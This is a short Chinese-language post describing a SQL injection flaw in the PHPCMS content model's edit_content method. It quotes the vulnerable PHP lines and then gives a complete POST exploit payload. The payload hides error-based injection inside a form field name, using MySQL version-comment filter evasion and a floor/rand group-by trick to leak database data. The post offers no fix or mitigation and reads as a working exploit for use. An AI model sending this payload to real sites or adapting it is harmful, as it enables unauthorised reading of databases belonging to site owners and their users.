PHPCMS SQL注入漏洞

edit_content方法位于： content_model.class.php




代码如下：



//主表
  $this->table_name = $this->db_tablepre.$model_tablename;
  $this->update($systeminfo,array('id'=>$id));

  //附属表
  $this->table_name = $this->table_name.'_data';
  $this->update($modelinfo,array('id'=>$id));
  $this->search_api($id,$inputinfo);





=====================

漏洞利用 ：POST提交：



dosubmit=1&info[catid]=6&info[`content` %3d1 where id%3d1 aNd (/*!50000select*/ 1 FROM (/*!50000select*/ count(*),concat(floor(rand(0)*2),(substring((/*!50000select*/ (version())),1,62)))a from information_schema.tables group by a)b); %23 ]=a&id=53&info[name]=b&info[isunique]=s